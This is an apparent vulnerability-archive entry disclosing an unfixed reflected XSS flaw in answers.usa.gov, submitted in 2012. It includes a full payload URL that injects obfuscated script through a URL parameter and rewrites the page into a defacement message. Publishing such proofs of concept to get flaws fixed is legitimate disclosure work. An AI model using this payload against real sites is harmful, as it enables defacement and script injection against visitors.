Security researcher flexxpoint, has submitted on 06/02/2012 a cross-site-scripting (XSS) vulnerability affecting answers.usa.gov, which at the time of submission ranked 7487 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/02/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 06/02/2012 |
Date published: 07/02/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: flexxpoint |
Domain: answers.usa.gov |
Category: XSS |
Pagerank: 7487 |
URL: http://answers.usa.gov/system/selfservice.controller?CONFIGURATION=1001&PARTITION_ID=1&CMD=STARTPAGE FRAMELESS&TIMEZONE_OFFSET=%22%3E%3C/scRipT%3E%3CscRipT%3Eeval(String.fromCharCode(99,111,110,102,105 ,114,109,40,34,88,83,83,45,66,71,34,41,59));%3C/scRipT%3E%3Cscript%3Edocument.body.innerHTML=%22%3Cs tyle%3Ebody{visibility:hidden;%20background:black;}%3C/style%3E%3Cdiv%20style=visibility:visible;%3E %3Ccenter%3E%3Ch1%3E%3Cfont%20color='white'%3EPlease%20fix%20your%20%3C/font%3E%3Cfont%20color='red' %3E%20XSS%20%3C/font%3E%3Cfont%20color='white'%3E!%3C/font%3E%3C/h1%3E%3Cfont%20color='white'%3EBest %20regards%20from%20Bulgaria!%3Ch1%3E%3Cfont%20color='red'%3E%20%20flexxpoint%3C/font%3E%3C/h1%3E%3C br%3E%22;%3C/script%3E |
Click here to view the mirror
|
|
|